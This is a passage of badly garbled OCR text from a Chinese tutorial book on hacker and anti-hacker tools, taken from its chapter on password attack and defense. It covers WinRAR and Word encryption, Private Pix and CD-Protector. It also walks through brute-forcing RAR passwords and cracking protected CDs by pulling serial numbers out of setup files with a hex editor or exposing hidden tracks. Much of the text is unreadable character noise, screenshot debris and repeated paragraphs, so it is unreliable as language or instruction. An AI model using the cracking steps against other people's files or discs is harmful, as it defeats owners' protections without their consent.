Firiform CChoarer ~ Profensional Editon 


CCleaner Professlonal ，: 


天 过 宣 位 HILRWETETEMICunen 
各 有 和 aa 
秘 件 后 遗 视 下 


肝 志 广 南 - 本 采访 主导 表 畏 . 


国 修复 结束 后 ， 可 看 到 
“已 修复 问题 ”提示 信息 。 
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= > 
全- 工具 全 攻略 
全 人 人 他 


STEP15: 单 击 “工具 ”按钮 


Piriiomm COkarar » Professional Edition 


teleaner Professional wv 17 a 


打开 “工具 ”界面 。 利用 这 些 工具 可 进行 和 卸载、 系统 
还 原 、 设 置 哪些 程序 随 系 统 运行 而 自动 运行 等 操作 。 


1 中 让 
北京 五 儿 信息 档 术 商 半 县 图。 : et 
MD) Spo Iborional rc, : 


| 
到 |: | 


CCleaner 可 从 计算 机 系统 中 搜索 并 清除 无 用 的 文件 和 垃圾 文件 ， 让 Windows 运行 更 
快 、 更 有 效率 并 释放 出 更 多 便 盘 衬 间 。 该 软件 还 具有 体积 小 、 运 行 速度 极 快 等 优点 。 
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数据 的 解密 技术 和 加 密 技 术 是 “了 矛 ” 与 “ 盾 ” 的 关系 ， 它 们 是 在 相互 斗争 
中 发 展 起 来 的 。 没 有 永远 不 可 破解 的 加 密 技 术 ， 然 而 ， 一 般 的 解密 技术 总 是 滞后 
于 加 黎 技 术 。 也 就 是 说 ， 一 般 的 解 老 技术 总 是 针对 茶 一 类 或 相关 加 黎 技 术 产 生 。 


O 六 种 常见 类 型 文件 的 加 密 解密 工具 
O 文件 和 文件 夫 密 码 攻防 

O 〇 系统 密码 攻防 

O 〇 加 密 精 灵 、MD5S 与 私人 磁盘 的 使 用 


Bo 各 ee 
全 人 人 他 


见 类 型 文件 的 加 密 解密 工具 


1041 RAR 讨 缩 文件 加 密 解 密 工具 


压 见 文件 在 日 常 操作 中 使 用 非 党 多 ， 将 所 制作 的 文档 通过 压缩 软件 来 实施 加 密 ， 不 仪 
可 以 减 小 磁盘 空间 ， 还 可 以 更 好 地 保护 目 己 的 文档 。 

1. 用 WinRAR 加 密 文件 

WinRAR 是 一 蒜 较 WinZip 晚 一 点 的 高 效 压 缩 软件 ， 其 不 但 在 压缩 比 、 操 作 方 法 方面 较 
Wn 而 且 可 以 支持 RAR、ZIP、ARJ、CAB 等 多 种 压缩 格式 ， 还 可 以 在 压缩 文件 
时 设置 密码 。 具 体 的 操作 步 又 如 下 。 


STEP01: 准备 要 压缩 的 文件 STEP02: 压缩 文件 名 和 参数 常规 设置 


它 称 新 建 (N) 


[i 
一 一 i 
EE 压缩 文件 名 届 ) 
管理 员 也 得 所 肥 常用 . rar = 


更 新 方式 QW) 
| Br. 
难 ”添加 到 [常用 .rar"m) | 

; 压缩 文件 格式 压缩 选项 
加 RR 同 Rhf5 D2ZIF 辣 压 巡 后 遇 除 源 交 件 名 ) 
回 创建 自 解压 格式 压缩 文件 多) 

压缩 方式 CC) 回 创建 固 实 压缩 文件 (5) 
标准 ”| | 加 添加 恢复 记录 @) 
字典 埃 小 (I) 站 测试 压缩 训 件 加) 
[os | ”| 站 锁定 讨 绽 文件 
压缩 为 分 卷 ， 坟 小 0) 


~ 3 | | 设置 审 礁 吕 . | 


右 击 需要 压缩 并 加 密 的 文件 ， 在 快捷 菜单 中 选取 ”图 设置 压缩 文件 的 名 称 ” 较 单 击 “设置 密码 ” 


“添加 到 压缩 文件 ”命令 。 及 压缩 格式 。 按钮 。 


STEP03: 输入 笑 码 STEP04: 生成 加 密 的 RAR 文件 


工具 (T) 帮助 (H) 
电子 邮件 ”新 建文 件 去 


国 输入 密码 输入 密码 及 确认 密码 。 而 认 志 三。 国 音 单 击 “ 确 定 ” 按 钮 。 查看 生成 的 .rar 文 件 。 
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2. RAR Password Recovery 
RAR Password Recovery 软件 专 为 解除 RAR 压缩 文件 的 密 人 码 而 制作 ， 其 操作 步骤 
如 下 。 


STEP01: 运行 RAR Password Recovery 软件 


单 击 “Open” 按 钮 ， 选 择 需 要 解除 密码 的 RAR 
文件 。 


选择 破解 方式 。 


Pp Pp 
© Brute-force Attack (Trying Al Possible Combinations) 
3 Brute-force with Mask Attack (If Some Password Symbols are Known) 


2013-11-11 10:26:8 ”Begin to aack password for the fie:E:\i 雷 下 载 PKmd5.rar 
password is:a 


单 击 “start” 按 钮 ， 即 开始 破解 。 


10:1.2 多 媒体 文件 加 密 解 密 工具 


Private Pix 是 一 亚 功 能 强大 的 多 媒体 加 密 工 具 , 其 也 文 持 对 音频 文件 或 视频 文件 进 
行 加 密 ， 为 用 户 提 供 了 全 面 的 功能 。Private Pix 提供 了 简单 易 用 的 界面 来 对 图 片 进行 管 
理 、 加 密 和 浏览 ， 让 用 户 在 合 看 图 片 文 件 的 同时 还 能 对 图 片 进行 加 窗 ， 并 且 其 有 两 种 
类 型 的 加 密 方 式 。 


使 用 Private Pix 对 文件 进行 加 密 的 有 具体 操作 步骤 如 下 。 


STEP01: 和 运行 Private Pix 软件 STEP02: 选择 是 否 注册 


人身 WAWWw.tropsoftcom Private Pix [tm] 
Information on How to Purchase Copyright ? Tropical Software, 2000 - 2010 
Buy a Reqgistration Key Nowl &ll rights reserwed 


Demo valid until | December 07 2013 29 Days left 


Run Prvate Pix in DERMD Mode 


Register | Exit | Uninstall | 


This screen dissappears when your product is registered! 


在 文本 框 中 输入 口令 。 第 单 击 “OK” 查看 软件 信息 并 填写 ” 国 单 击 “Run Private 
一 次 使 用 时 须 创 建 一 个 口令 。 ”按钮 。 注册 内 容 。 不 能 完成 注册 Pix in DEMO Mode” 
时 ， 可 免费 试用 一 个 月 。 ”按钮 。 
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ST IF 一 一 > 


具 全 攻略 


人 SO 
STEP03: 进入 “Private Pix” 主 窗口 


讽 Private Pix (tm 
| File Edit View Encryption Autopay Help 
上 守信 有 人 mx 上 外 ++ 国富 戈 己 I? . 
Encryption Type: Encrypted File Name: Enctyption Key 


| Town Encryption -| ?| [Fast "| ?| [7 SameasPassword ChargeKey | SuggestKey | Esc| 


Ex 上 
i 昌国 视 


| 由 国 图 片 Easily Encrypt or S 

让 

二 I Get rid of this ad. Buy Private Pix now... 
| 由 - 团 文档 


和 从 Home Page | 重 List View| 洋 Thumbnail View | 参 Apel seanes @ Hep| 
” [三 区 避 | orn Tn TT Hi 


四- 蝎 家 庭 组 

由 只 Administrator 
调 计算 机 

由 -人 a 网 络 

申 团 控制 面板 


BB | Rs 民 虽 | VAN 


1 
18 
10 
10 
10 
10 
D1 
1m 


Em VR VR ER EE EE | 
2COoeoee- 


Private Pixm is a privdcy and security tool that gives the user a Way 
to encrypt private file$ and then view them while they are still 
encrypted! Use it to priotect your video, audio, and image files. It 
even helps keep media files organized! View files one-by-one or use 
the Autoplay mode. 


3 List View 


4 Tumbnail View 
3 Autoplay 

3 settings 

3 User Manual 


[一 ww | [Rearer | 


Private Pix™. To purchase please Visit www.tropsoft.con 


Copyright © Tropical Software, All rights reserved. 


= 
\ 
NS 


| Avtoplay OF-25 


Private Pix 加 密 工具 主要 由 显示 窗口 和 控制 窗口 两 部 分 组 设置 密 钥 ， 选 择 “Settings” 选 项 
成 ， 在 左边 的 显示 窗口 中 选择 要 加 密 的 多 媒体 文件 。 卡 。 如 果 不 设置 密 钥 ， 则 使 用 默认 密 钥 。 


STEP04: 打开 “Settings” 选 项 卡 


碟 Private Pix (tm) 
中 | Fle Edit view Encryption Autoplay Help 


他 | 名 且 生硬 尖 | 用 下 jl-+ 国 各 四 | 双 二 ?了 不 . 


| Encryption Type: Encrypted File Name' Encryption Key 

2 | ?| Fi 了 | |¥ Same as Password | Suggest Key | 剧 

| Beef Up Your 
Fn Encryption Power! 


Get rid of this ad. Buv Private Pix now... 


窗 Home page| 性 List View | 沪 Thumbnail View | 稳 Autoply @ Hep | 
Explanation 


Place the mouse cursor over a setting to display the relevant explanation 


Thumbnail Size 

Unencrypted Back Color 

Encrypted Back Color 
1NNMANANMI Auto Load Thumbnails 


Auto Encrypt 
Filename Encrypt Key 
Enable Hide In Picture Support 
Enable Hide In MP3 Support 
Shred when deleting 
Hide In Picture and Music Settings 
Encrypted File Name Maintain Drg Filename 
点 uto Chose Picture “MP3 Yes 
Folder for media fles GS 


Administration Settings 
Window Title Private Pix [tm) 
Change Password 

点 sk Password At Start 

Always ask folder for copy/move 

Folder for copy/move 


Start on Home Page 
Nisnlan Shile 


| Autoplay Off-2s 


从 “Encryption Type” 下 拉 列 表 框 中 单 击 “Filename Encrypt Key” 选 项 右 侧 的 密码 处 ， 
选择 一 种 文件 加 密 类 型 。 会 出 现 一 个 [Lj 按钮 ， 单 击 此 按钮 。 
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STEP05: 输入 密码 STEP06: 修改 客 码 STEP07: 黎 码 修改 成 功 


Enter Password 


Change Password Private Pix(tm) 


bb ~ 


Enter your current password first: 


Enter New Password: [dom't forget it] 


|456783 
Cancel | 


输入 新 密码 并 单 击 “OK” 按 钮 。 


Password Changed 


输入 之 前 设置 的 密码 并 单 击 “OK” 
按钮 。 


STEPO8: 


改变 管理 密码 


[A Private Pix (tm) 
| Fle Edt View 


|] 综 | 入 有 EE 


Encryption Autoplay Help 
EX| 晤 四 | 全 | 二 二 国 和 | 图 | 卫 取 |? 击 
和 Type: Encrypted File Name: Encryption Key 


[Blowfish Encryption ”| ?| [Fast -| |[¥ Same as Password | 攻 5uggest Key = 


[ET D 


| 申 国 PPTV 视 频 
申 晴 视频 

| 外国 图 片 三 
后 国 六 并 

田 局 | 迅雷 下 载 


,Beef Up Your 
上 PEWEE: 


由 - 动 音乐 
由 三 京 庭 组 
| 由 愉 ssn 
由 - 调 | 计算 机 
申 - 佬 网 络 
控制 面板 


TMAANIANNI 


从 Home page | 时 List View | : Thumbnail View | 给 Autoplay 


|| Thumbnail Size 
Unencrypted Back Color 
Encfypted Back Color 
Auto Load Thumbnails 


点 uto Encrypt 
Filename Encrypt Key 
Enable Hide In Picture Support 
Enable Hide In MP3 Support 
Shred when deleting 
Hide In Picture and Music Settings 
Encrypted File Name Maintain Ora Filename 
|| Auto Chose Picture / MP3 Yes 
Folder for media files 人 


&dministiation Settings 

Window Title Private Pix (tm) 

Change Password 

Bsk Password at Start 

Blways ask folder for copy/move 
|| Folder for copy/move 

Start on Home Page 

misnla She Nefauilt 


在 “Administration Settings” 栏 目 中 单 击 “Change Password” 


Help | 


Explanation 
Place the mouse cursor over a setting to display the relevant explanation 


| Autoplay Off-2s 


钮 ， 单 击 此 按钮 。 


STEPO9: 


Enter Password 


Enter wour current password first: 


二 二 十 3 


输入 之 前 设置 的 密码 并 单 击 “OK” 


按钮 。 


输入 窗 码 


STEPT1O: 


Change Password 


Enter New Password: [dom't 


Lancel | 


输入 新 密码 


输入 新 密码 并 单 击 “OK” 按 钮 。 


选项 右 侧 的 密码 处 ， 会 出 现 一 个 [Cj] 按 


STEP11: 密码 修改 成 功 


forget it] 
Password Changed 


[456789 


单 击 “确定 ”按钮 。 
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Pe > 
和- 工具 全 攻略 


STEP12: 返回 “Private Pix” 主 窗口 STEP13: 加 窖 成 功 


FF Edg Vi Encryption Autopay Hep 
= 一 全 一 | 应 双 | + 国生 | 轩 | 双 了 芭 | 村. 
Encrypted Fle Name Encryplion Key | ion Type: Encppted Fle Name Encrypti 


yplion Key 
了 了 ?| Same asPassword Suggest Key 恒 | | lowish | ? ? Same as Passwcrd Suggest Key 本 | 
THE DAY IS SAVED! THANKS ey AVLs op 
- i 


| Setup_Fluxay5 
| sg3.0 sg3.0 
| Sniffer Pro 4 70 530 CE Sniffer Pro 4 70 530 

sniffer pro 4.70.530 充 化 注 简 版 Te 下 PETER 和 wap 和 sniffer pro 4,70.530 汉 化 注册 栈 


ssmq 

SSS 扫 搓 匡 7.84 版 本 
SymantecpcAnywhere3987 
S 扫 演 器 


[CE 
File 


丑 湖 


团 在 显示 窗口 中 选择 要 。 圈 单 击 加 密 按 钮 图 。 加 密 后 的 文件 由 原来 的 绿色 变 成 了 红色 。 
加 密 的 文件 。 


STEP14: 解密 文件 


选择 要 解密 的 文件 。 


ssmq 
SSS 扫 后 器 7.84 版 本 
SymantecpcAnywhere3987 


单 击 解密 按钮 贺 ， 这 样 被 加 密 的 文件 就 可 以 
被 恢复 原状 了 。 


10:1.3 ”光盘 加 密 解 密 工具 


按照 传统 的 方式 将 数据 刻录 在 光盘 上 ， 这 种 方式 用 于 备份 一 些 普通 的 资料 还 可 以 ， 而 


对 于 备份 一 些 重要 数据 驶 存在 危险 了 ， 里 面 的 数据 很 有 可 能 被 其 他 人 非法 获取 。 由 于 光盘 
存 取 数 据 和 材料 的 特殊 性 ， 对 光盘 进行 加 蜜 也 成 了 一 个 问题 。 

1. 使 用 CD-Protector 软件 加 密 光 盘 

CD-Protector 是 一 个 简单 易 用 的 光盘 加 密 软 件 ， 被 它 加 密 后 ， 即 使 把 所 有 文件 复制 
到 便 失 上， 文件 仍然 不 能 使 用 。CD-Protector 加 密 时 所 使 用 到 的 相关 软件 有 Nero， 加 
密 原 理 是 在 可 执行 文件 上 加 一 个 外 羌 ， 该 外 过 会 判断 所 运行 光盘 上 有 没有 加 密 后 所 产 
生 的 相对 应 的 首 频 轨道 ， 如 果 有 则 运行 ,没有 则 会 拒绝 运行 。CD-Protector 加 密 时 不 用 
修改 Cue 文件 ,不 用 交 巷 写 入 坏 轨 道 。 由 于 使 用 了 Nero 刻录 软件 ， 因 此 对 刻录 机 要 求 
不 高 。 


CD-Protector 加 密 的 县 体 的 操作 步骤 如 下 。 
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STEP01: 运行 “CDProt3.exe” 应 用 程序 


机 单 击 “File to encrypt" 文本 框 后 的 图 按钮 , 选择 要 

UTC 下 用 几 届 引 加 密 的 文件 ， 在 “Custom Message” 文 本 框 中 输 
入 出 错时 的 提示 信息 ( 可 自行 选择 填写 , 也 可 不 填 ) ; 

| 单 击 “Phantom Trax' directory ”文本 框 后 的 加 按 

Was A | 这 这 二 : 钮 ， 选 择 文件 输出 时 的 目录 ; 在 "Encryption Key” 


文本 框 中 输入 两 位 十 六 进 制 的 数字 ， 这 里 可 以 输入 
二 = | 00 -~ FF 。 不 同 的 十 六 位 进 制 数字 代表 产生 不 同 的 


特殊 加 密 轨道 ， 共 有 256 种 。 


STEP02: 开始 加 窖 文件 


人 pp V3:00 
OT 二 
File En Ei BuskdnmMessadges 
bewdee B® | 在 设置 完成 之 后 ， 可 看 到 “ACCEPT” 按 钮 变 成 红 
phantonn lia direackonys Enety Edm key 
hn 色 。 单 击 红色 的 “ACCEPT” 按 钮 ， 即 开始 加 密 文 


| 一 SS > se = 


STEP03: 运行 Nero 主 程序 STEP04: 刻 系 设置 


SS MM 
ES 


^ | | CDA 文 件 第 略 [H]: ^| | 操作 


[ 投 大 本 和 十 全 认 个 Gl 中 | “ 口 确定 最 大 这 度 吕 


驱动 器 [6] | 回 写 入 [d] 
= 设备 名 称 ”速度 了 回 结束 光盘 (不 可 再 写 入 ! )IM] 
3 | | 校 验 与 入 数 指 


dx 


刻录 之 前 在 硬盘 驱动 器 上 纤 存 轨道 中 
高 级 


选择 “音乐 光盘 "， 在 “音乐 CD 选项 ”选项 卡 中 弥 在 “刻录 ”选项 卡 中 多” 国 单 击 “新建” 按 
选 这 两 个 复 选 框 。 选 “ 写 入 ” 复 选 框 ， 取 消 勾 。 钮 ， 新 建 音乐 光盘 
选 “ 结 束 光盘 ” 复 选 框 。 ”刻录 任务 。 

把 用 CD-Protector 加 密 过 的 音频 文件 ， 拖 放 到 刻录 音 轨 的 窗口 。 刻 录 完 成 后 ， 还 需要 
再 执行 一 过 刻录 设置 ， 主 要 是 为 了 用 这 个 方法 对 同一 个 音频 文件 刻录 两 次 。 在 Nero 中 再 新 
于 一 个 上 只 该 光盘 的 任务 ， 在 “多 记录 ”选项 卡 中 勺 选 “ 开 记 多 记录 光碟 ” 复 选 项 ， 其 他 选 
项 可 根据 需要 进行 相应 的 设置 。 完 成 上 述 设置 之 后 , 单 击 “新 建 ” 按 钮 ， 把 用 CD-Protector 
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客 二 
区 -工具 人 改 了 


全 全 人 

加 蜜 的 〈 除 音频 文件 外 ) 文件 都 拖 放 到 数据 刻录 的 窗口 并 开始 刻录 ， 和 刻录 的 选项 和 刻录 首 
轨 相 同 。 

此 时 ， 束 可 以 看 到 同一 个 首 频 文件 再 次 刻录 的 结果 是 不 同 的 。 使 用 CD-Protector 加 密 
过 的 光盘 放 进 光驱 里 ， 看 到 文件 是 可 运行 的 ， 但 复制 到 目 己 的 便 盘 时 束 不 能 运行 了 。 
CD-Protector 加 黎 的 光盘 由 两 条 音 轨 和 一 条 数据 轨道 共同 组 成 , 数据 轨道 中 被 加 答 的 可 执行 
文件 在 运行 时 将 会 读 取 光盘 上 的 首 轨 ， 只 有 相对 应 才 会 继续 运行 。 

2. 破解 加 密 光 盘 

如 今 市 面 上 有 很 多 加 密 光 盘 是 以 特殊 形式 刻录 的 ， 将 它 放 入 光驱 后 束 会 出 现 一 个 软件 
的 安 闭 画面 ， 要 求 输入 序列 号 ， 如 果 序 列 亏 正确 驶 会 出 现 一 个 文件 浏览 窗口 ， 钳 误 则 跳 回 
更 面 。 如 果 用 户 从 资源 浏览 喜 中 所 观看 的 光盘 文件 怠 是 一 些 图 片 文件 ， 而 想 找 的 文件 却 怎 
么 也 看 不 到 ， 这 时 束 需 要 对 光盘 进行 解密 了 ， 下 和 面 介绍 几 种 常用 的 破解 加 密 光 盘 方 法 。 

(1) 用 UltraEdit 等 十 六 进 制 编辑 器 直接 找到 序列 号 

运行 UltraEdit 编辑 器 ， 打 开光 盘 根 目 录 下 的 SETUPexe 文件 之 后 ， 选 择 “ 搜 索 ”>“ 查 找 ” 
来 蛙 命 令 ， 即 可 弹出 “查找 ”对 话 框 。 在 “查找 什么 ” 栏 的 “请 输入 序列 写 ” 文 本 框 中 输入 序列 
号 之 后 ， 勾 选 “ 奉 找 ASCII 字符 ” 复 选 栓 ， 在 “请 输入 序列 号” 后 面 显 示 的 数字 束 是 序列 号 了 了 。 

(2) 用 ISOBuster 等 光盘 刻录 软件 直接 浏览 光盘 上 的 隐藏 文件 

打开 ISOBuster 光盘 刻录 软件 之 后 ， 选 择 加 密 盘 所 在 的 光驱 ， 单 击 选择 栏 劳 边 的 “ 刷 
新 ”按钮 ， 即 开始 谈 取 光驱 中 的 文件 ， 这 时 会 发 现在 左边 的 文件 浏览 框 中 多 了 一 个 文件 夹 ， 
那里 面 束 是 我 们 要 找 的 文件 ， 可 以 直接 运行 和 复制 这 些 文件 。 

(3) 用 虚拟 光驱 软件 和 十 六 进 制 编辑 颖 

1) 用 虚拟 光驱 软件 把 加 密 光 检 做 成 虚拟 光盘 文件 ， 进行 到 1% 时 终止 虚拟 光驱 程序 运行 。 

2) 用 十 六 进 制 编辑 器 打开 只 进行 了 1% 的 光盘 文件 ， 在 编辑 窗口 中 查找 任意 看 得 见 的 
文件 夹 或 文件 名 ， 在 该 位 置 的 上 和 耐 或 下 和 而 就 可 以 看 到 隐 叫 的 文件 来 或 文件 名 了 。 

3) 在 MS-DOS 模式 下 使 用 CD 命令 进行 查看 目录 ， 再 使 用 DIR 命令 就 可 以 看 到 想 找 
的 文件 ， 并 可 对 其 进行 运行 和 复制 。 

(4) 利用 File Monitor 对 付 隐 藏 目录 的 加 密 光 盘 

File Monitor 是 纯 “ 绿 色 ” 免 费 软件 ， 可 监视 系统 中 指定 文件 运行 状况 ， 如 指定 文件 打 
开 了 哪个 文件 、 关 财 了 哪个 文件 、 对 哪个 文件 进行 了 数据 读 取 等 。 通 过 它 可 以 监视 指定 文 
件 的 任何 谈 、 写 、 打 开 其 他 文件 的 操作 ， 并 提供 完整 的 报告 信息 。 使 用 它 的 这 个 功能 可 以 
监视 加 密 光 盘 中 的 文件 运行 情况 ， 从 而 得 到 想 要 的 内 容 。 


10.1.4 ”Word 文件 加 密 解 密 工具 


大 多 数 文档 编辑 都 是 在 Office 中 完成 的 , 这 就 会 涉及 一 些 文件 安全 问题 , 所 以 对 Office 
文件 进行 加 密 束 显得 非常 必要 了 。 

Microsoft Office Word 在 提供 加 密 文 档 的 同时 ， 还 提供 保护 文档 功能 。 在 本 节 将 介绍 对 
Word 文档 进行 加 密 ， 以 防止 别人 进行 血 探 与 修改 。 

1. 使 用 强制 保护 功能 

Microsoft Office Word 目 带 的 强制 保护 功能 可 以 帮助 用 户 保 护 目 己 的 Word 文档 不 被 修 
改 ， 有 基体 的 操作 步骤 如 下 。 
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STEP01: 打开 要 加 密 的 Word 文件 STEP02: 查看 “限制 格式 和 编辑 ”窗口 


ER 


前 言 . 
当 绪 束 了 白 日 啶 项， 能 华 的 邦 市 像 个 玩 累 了 的 孩子 司 异 安 隐 了 下 来 ， 和 
袜 息 的 四 衣 量 ， 某 个 者 市 的 角落 ， 倪 弱 的 光 亚 条 置 着 一 个 不 大 的 房间 ， 导 昱 中 
人 一 个 人 ,一 台 等 记 本 ， 一杯 息 了 又 凉 、 CET 一 


祖 和 还 没有 挂 完 的 烟 ， 
在 大 家 眼中 , “黑客 ” 7 其 定义 范 转生 括 了 反 社会 的 i 算 机 
天 才 到 恶意 病毒 的 坊 写 者 。 因 此 ,如同 在 媒体 故事 中 所 描述 的 著 样 ， 现 代 黑 客 试图 攻击 
刚才 ， 从 而 进行 识别 从 布 、 态 取信 用 卡 账号 、 
算 机 网 结 的 替 及 、 坎 客 工具 的 村 所 ， 快 得 一 些 有 刍 客 之 名 无 轩 客 之 实 的 人 ， 使 用 漳 单 的 
工具 ， i 的 电脑 里 为 所 就 为 。 当 发 观 自己 的 
HR 而 盘 变 作 一 团 空白 之 时 ， 两 想 亡羊补牢 ， 却 为 时 已 绚 。* 


尝 结 来 了 白 日 哈 车 ， 雌 华 的 地 像 个 玩 轩 了 的 琉 子 异 慢 安 阮 了 下 来 ， 在 焰 农 得 令 人 
宜 息 的 邮 夜 里 ， 某 个 都 市 的 角 范 ， 葵 局 的 光 带 窜 置 着 一 个 不 大 的 房间 ， 需 喻 中 ,显示 屏 
mhr 一 个 人 ; 一 全 笔记 本 ， leis 下] 


报 还 没有 持 完 的 妇 ， 还 有 邢 斥 下 积 直 于 何 处 的 服务 器 ， 依 

在 大 家 眼中 “黑客 ”一 词 具 有 一 定 的 冲 秘 性 ， 将 久 和 国友 社会 的 和 机 
天 才 到 恶意 病毒 的 坊 瑟 者 。 因此， 如 同 在 媒体 故事 中 所 描述 的 矿 样 ， 现 代 慰 客 试图 让 击 
网 I 千 ， 从 而 进行 识别 偷 闸 、 面 职 信用 卡 犹 等、 思索 银行 蒜 发 起 掩 绝 服 务 攻击 筠 。 随 关 计 
算 机 网 络 的 符 及 、 因 客 工具 的 传播 ， 使 得 一 些 有 黑客 之 宅 无 黑客 之 奖 的 人 ,局 用 篇 单 的 
工具 ， 对 一 些 该 于 防范 的 电脑 作 册 攻击， 并 在 受 侵入 的 电脑 里 为 所 从 为 。 当 发 现 自己 的 
密码 贸 次 、 OE 研 盘 变 作 一 国 空白 之 讨 ， 再 想 亡 羊 朴 军 ， 却 为 时 已 唤 * 


选择 “审阅 ”选项 卡 ， 然 后 单 击 “限制 编辑 ”按钮 。 勾 选 “ 仅 允 许 在 文档 中 进行 此 类 编辑 ” 复 选 框 。 
STEP03: 激活 “是 ， 启 动 强制 保护 ”按钮 STEP04: 窖 码 保护 


后 项 风 忆 一 一 莽 豆 与 反 罗 工具 侍 用 详解 》 胆 只,do< [ 荐 写 模式 ] - Microsok Word 


” 限制 编辑 


1. 站 式 设 赴 涪 制 


en ( 记 档 溉 有 加 密 。 悉 意 用 户 可 能 会 编辑 文件 和 删除 密码 。) 


i 新 要 三 呵 挝 日 :| 一 


前 言 . ET 


当 结 束 了 白 日 因 ， 北 华 的 六 市 怕人 玩 累 了 的 沪 子 异 民 安稳 了 下 来 ， 在 通 家 得 令 人 i 确认 新 密码 (PP): a 
的 恨 认 里 ， 茶 个 寻 市 的 角落 ， 搁 弱 的 光世 时 看 一 个 不 大 的 房间 , 黑 浪 中 ,显示 异 es 
地 出 六 苗 色 的 光 苍 。 一 个 人 ， 一 扣 芝 记 本 ， 一 标的 了 又 六 、 总 hd, 一 人 全 站 周记 


于 届 有 拍 这 的 组 ， 还 有 部 台 不 4 处 于 体外 的 眼 务 吕 ， 体 旧 继 顽 着 -… ~ 局) 用 户 验 证 中 


，“ 慰 帮 ”一 沁 由 有 一 证 的 入 科 性 ， 其 主义 区 图 包括 了 反 社 会 的 计算 机 
em ns [一 (已 验证 的 所 有 者 可 以 出 除 文档 保护 。 文 档 被 加 密 并 启用 
失修 和 所有 为 可 为。 当 必 了 自己 的 3. Ep "限制 访问 "。) 


8 入 次 、 2 2 两 想 亡 羊 补 牢 ， 却 为 时 已 绚 。* 从 是 否 济 血 邮 用 这 慈 设 置 ? ( 字 可 以 


单 击 是 ， 启动 强制 保护， 按钮 。 选中 “密码 ” 单 选 按钮 并 输入 密码 ， 单 击 “ 确 定 ” 
按钮 ， 即 可 对 该 Word 文 档 进行 保护 。 启 用 保护 后 
不 能 对 Word 文 档 进 行 修改 。 


STEP05: 取消 保护 STEP06: 打开 “取消 保护 文档 ”对 话 框 


《所 其 只 最 一 一 闫 要 与 到 本 工具 使 用 主 航 》 夏 夏 .dcc [本 中 机 忆 - Microsok Word 


本 技 下 一 个 司 榴 锥 的 区 城 
时 未 司 篇 瑞光 所 有 区 着 
Y 商 二 是 地 可 而 大 3)G 过 


; 现代 黑客 
务 玫 击 等 。 随 着 计 


从 而 进行 识 列 偏 窃 、 
碳 人 的 蔡 及 、 黑客 工具 的 传 盎 ， 使 刘 一 些 有 有 黑客 之 名 天 黑客 之 实 的 人 ， 使 用 简单 的 
工具 ， 对 一 2 芍 帮 于 防范 的 电脑 作出 攻击 ， 并 在 受 侵入 的 电脑 里 为 所 铀 为 。 当 发 现 自己 的 
窜 码 楼 盗 、 资 料 被 烽 改 删 从、 砚 盘 突 作 一 团 空 白 之 时 ， 两 炉 亡 革 扑 中 ， 却 为 时 已 晚 。" 


在 现实 生活 中 ， RN 他们 格 众 多 强大 的 工具 给 言 
起 来 解决 自己 的 霸 求 ， 还 可 能 是 那些 使 用 “ 合 人 
人 隐私 的 人 。 艾 话说 : 害 人 之 心 不 可 有 ， eva 450 丢 方 能 百 战 不 

本 书 价 是 基于 这 样 一 个 目的 而 放生 了 衣 际 基础 的 风 络 知识 、 通 号 j 
手段 与 常用 黑客 软件 ， 从 丽 用 0 识 与 技巧 将 自己 的 计 夏 机 与 网 千 很 好 地 保护 起 来 ， 达 到 
防 患 于 来 械 的 目的 。 


gl *“ 攻 ”、*“ 防 ”两 个 不 同 的 角度， 在 请 韦 民 客 攻击 手段 的 司 寺 ,介绍 了 
范 方法 ， 国 六 并 地 丙 了 风 入 委 居 的 全 这 浊 。 本 书 此 次 油 扫 了 岂 客 必 


用 工具 网游 与 廓 攻防 工具 、 安 约 攻 扰 工 具 、 了 代理 与 兴工 具 、 局 过 同居 客 工具 、 


单 击 “停止 保护 ”按钮 。 输入 刚 设 置 的 密码 ， 单 击 “ 确 定 ” 按 钮 ， 即 可 取消 
对 该 Word 文 档 进行 编辑 操作 的 保护 。 
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工具 全 攻略 


合 人 他 他 


2. 使 用 “常规 选项 ”进行 加 密 


在 Microsoft Office Word 的 “常规 选项 ”中 ， 不 仪 可 以 设置 打开 Word 文档 的 密码 ， 
可 以 设置 修改 Word 文档 的 密码 ， 这 样 可 以 对 Word 文档 具有 双重 保护 作用 。 


使 用 “常规 选项 ”加 密 Word 文档 的 具体 操作 步 


STEP01: 打开 Word 主 窗口 


《反胃 风 局 一 一 基 到 与 号 项 工 具 主 用 洋 解 》 民 内 ,doc [ 王 
诊 半 | 买 隙 让 二 3 用 


SA 
拼写 和 语法 ”定义 同义词 亩 字数 的 计 。 程 混 三 富 


二 志和 己 的 未， 还 可 能 是 


单 击 “ 文 件 ” 选 项 卡 。 
STEP03: 打开 “为 存 为 ”对 话 框 


团 另存 为 E37 
GO 


没有 与 搜索 冬 件 匹配 的 项 。 


设置 保存 位 
置 和 保存 名 称 。 


单 击 “工具 ”按钮 ， 在 
下 拉 菜 单 中 选择 “常规 选项 " 
选项 。 
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又 如 下 。 
STEP02: 打开 “信息 ”窗口 


《 反 黑 风暴 一 一 黑客 与 反 黑 工具 使 用 详解 》 雇 页 


EE x 2014 计 是 x 王 针 选 舌 申 控 * 办 客 > 《 反 人 血 风 易 一 一 界 训 与 反 舌 工具 使 用 详解 》 


项 容 模式 
与 得 版 专 的 Of6ce 一 已 征用 233 一 以 节 消 出 现 问 申 ， 蔡 流 此 文件 摇 
居 用 这 密 功 提 , 但 tii 


保护 文档 


往 甫 其 从 人 可 以 对 贡 文 本 所 可 的 丁 改 贡 沈 . 


检查 文档 


在 发 布 此 文件 之 前 ,请 注 生 其 但 会 以 下 内 容 : 


单 击 “ 男 存 为 ”选项 。 


STEP04: 打开 “常规 选项 ”对 话 框 


常规 选项 


| 


此 文档 的 文件 加 密 选 项 


司 建 议 以 只 读 吉 打开 文档 (E) 

保护 文档 (B).| | 

去 安全 性 

调整 安全 级 别 以 打开 可 能 包含 安 病夫 的 文件 ， 并 揪 定 可 信任 的 安 创 建 者 姓名 。 


分 别 在 “打开 文件 时 的 密码 " 单 击 “ 确 
文本 框 和 “修改 文件 时 的 密码 " 文 ” 定 ”按钮 。 


本 框 中 输入 相应 的 密码 。 


< 第 10 章 


密码 攻防 


STEP05: 再 次 输入 打开 文件 时 的 密码 STEP06: 再 次 输入 修改 文件 时 的 密码 


设 症 修改 权限 密 录 不 呈 安 全 功能 。 使 用 此 功能 , 能 
9 此 ee 但 不 能 为 其 加 密 ， 因而 符 意 用 


输入 设置 的 打开 贺 单 击 “ 确 定 " 按钮 。 国 输入 设置 的 修 国 单 击 “ 确 定 ” 按钮。 返回“ 另 


